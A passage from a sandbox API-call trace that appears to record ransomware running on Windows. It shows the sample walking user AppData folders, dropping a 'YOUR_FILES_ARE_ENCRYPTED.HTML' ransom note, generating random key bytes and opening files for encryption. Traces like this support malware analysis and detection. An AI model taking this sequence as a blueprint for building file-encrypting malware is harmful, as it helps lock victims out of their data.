Live\\Bici" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici" [0163.600] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*" [0163.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad51fbf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad51fbf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad51fbf0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x450, dwReserved0=0x0, dwReserved1=0x60, cFileName="_00.sqm", cAlternateFileName="")) returned 1 [0163.600] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_00.sqm") returned 73 [0163.600] lstrcmpW (lpString1="_00.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.600] PathFindExtensionW (pszPath="_00.sqm") returned=".sqm" [0163.600] lstrlenW (lpString=".sqm") returned 4 [0163.600] PathFindExtensionW (pszPath="_00.sqm") returned=".sqm" [0163.600] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad75b090, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad75b090, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad75b090, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x338, dwReserved0=0x0, dwReserved1=0x60, cFileName="_01.sqm", cAlternateFileName="")) returned 1 [0163.600] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_01.sqm") returned 73 [0163.601] lstrcmpW (lpString1="_01.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.601] PathFindExtensionW (pszPath="_01.sqm") returned=".sqm" [0163.601] lstrlenW (lpString=".sqm") returned 4 [0163.601] PathFindExtensionW (pszPath="_01.sqm") returned=".sqm" [0163.601] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae89d010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xae89d010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="_02.sqm", cAlternateFileName="")) returned 1 [0163.601] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\_02.sqm") returned 73 [0163.601] lstrcmpW (lpString1="_02.sqm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.601] PathFindExtensionW (pszPath="_02.sqm") returned=".sqm" [0163.601] lstrlenW (lpString=".sqm") returned 4 [0163.601] PathFindExtensionW (pszPath="_02.sqm") returned=".sqm" [0163.601] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xae89d010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xae89d010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xae89d010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0x0, dwReserved1=0x60, cFileName="_02.sqm", cAlternateFileName="")) returned 0 [0163.601] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.601] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0163.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows live\\bici\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.602] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.605] CloseHandle (hObject=0x58c) returned 1 [0163.605] GetProcessHeap () returned 0x270000 [0163.606] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.606] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Bici", cAlternateFileName="")) returned 0 [0163.606] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.607] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0163.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows live\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.607] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.610] CloseHandle (hObject=0x4a8) returned 1 [0163.610] GetProcessHeap () returned 0x270000 [0163.611] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.611] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Mail", cAlternateFileName="WINDOW~3")) returned 1 [0163.611] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail") returned 60 [0163.611] GetProcessHeap () returned 0x270000 [0163.611] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.611] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail" [0163.611] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*" [0163.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.614] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd484f930, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd484f930, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.614] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x5e4, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", cAlternateFileName="ACCOUN~3.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{81FF0B87-DBD4-46A5-A9FF-EF000B2F9024}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x859b5889, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", cAlternateFileName="ACCOUN~2.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{A9B27062-9101-460A-98C0-C2AA26B0F943}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x858aaee7, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x2a0, dwReserved0=0x0, dwReserved1=0x60, cFileName="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", cAlternateFileName="ACCOUN~1.OEA")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned 116 [0163.615] lstrcmpW (lpString1="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.615] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0163.615] lstrlenW (lpString=".oeaccount") returned 10 [0163.615] PathFindExtensionW (pszPath="account{D08688DB-6514-4DC0-9D54-33D56D2EF97E}.oeaccount") returned=".oeaccount" [0163.615] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Backup", cAlternateFileName="")) returned 1 [0163.615] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned 67 [0163.615] GetProcessHeap () returned 0x270000 [0163.615] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.615] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup" [0163.615] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*" [0163.615] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd4875a90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd4875a90, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.616] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="old", cAlternateFileName="")) returned 1 [0163.616] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned 71 [0163.616] GetProcessHeap () returned 0x270000 [0163.616] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.616] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old" [0163.616] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*" [0163.616] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.616] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82ca1796, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.617] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2559610, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2559610, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82c554d6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0x0, dwReserved1=0x60, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0163.617] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned 84 [0163.617] lstrcmpW (lpString1="edb00001.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.617] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.617] lstrlenW (lpString=".log") returned 4 [0163.617] PathFindExtensionW (pszPath="edb00001.log") returned=".log" [0163.617] SystemFunction036 (in: RandomBuffer=0x4ebcec8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebcec8) returned 1 [0163.617] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\backup\\old\\edb00001.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.618] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebceec | out: lpFileSize=0x4ebceec*=2097152) returned 1 [0163.618] GetProcessHeap () returned 0x270000 [0163.618] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.619] wsprintfW (in: param_1=0x4ebce06, param_2="%02X" | out: param_1="22") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce0a, param_2="%02X" | out: param_1="A7") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce0e, param_2="%02X" | out: param_1="C0") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce12, param_2="%02X" | out: param_1="7E") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce16, param_2="%02X" | out: param_1="78") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce1a, param_2="%02X" | out: param_1="2B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce1e, param_2="%02X" | out: param_1="11") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce22, param_2="%02X" | out: param_1="B7") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce26, param_2="%02X" | out: param_1="59") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce2a, param_2="%02X" | out: param_1="85") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce2e, param_2="%02X" | out: param_1="FF") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce32, param_2="%02X" | out: param_1="0E") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce36, param_2="%02X" | out: param_1="34") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce3a, param_2="%02X" | out: param_1="03") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce3e, param_2="%02X" | out: param_1="4D") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce42, param_2="%02X" | out: param_1="8E") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce46, param_2="%02X" | out: param_1="12") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce4a, param_2="%02X" | out: param_1="15") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce4e, param_2="%02X" | out: param_1="4D") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce52, param_2="%02X" | out: param_1="18") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce56, param_2="%02X" | out: param_1="01") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce5a, param_2="%02X" | out: param_1="A6") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce5e, param_2="%02X" | out: param_1="CB") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce62, param_2="%02X" | out: param_1="19") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce66, param_2="%02X" | out: param_1="1B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce6a, param_2="%02X" | out: param_1="9B") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce6e, param_2="%02X" | out: param_1="3C") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce72, param_2="%02X" | out: param_1="DB") returned 2 [0163.619] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="10") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="37") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="AA") returned 2 [0163.620] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="19") returned 2 [0163.620] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\edb00001.log" [0163.620] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.620] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.620] FindNextFileW (in: 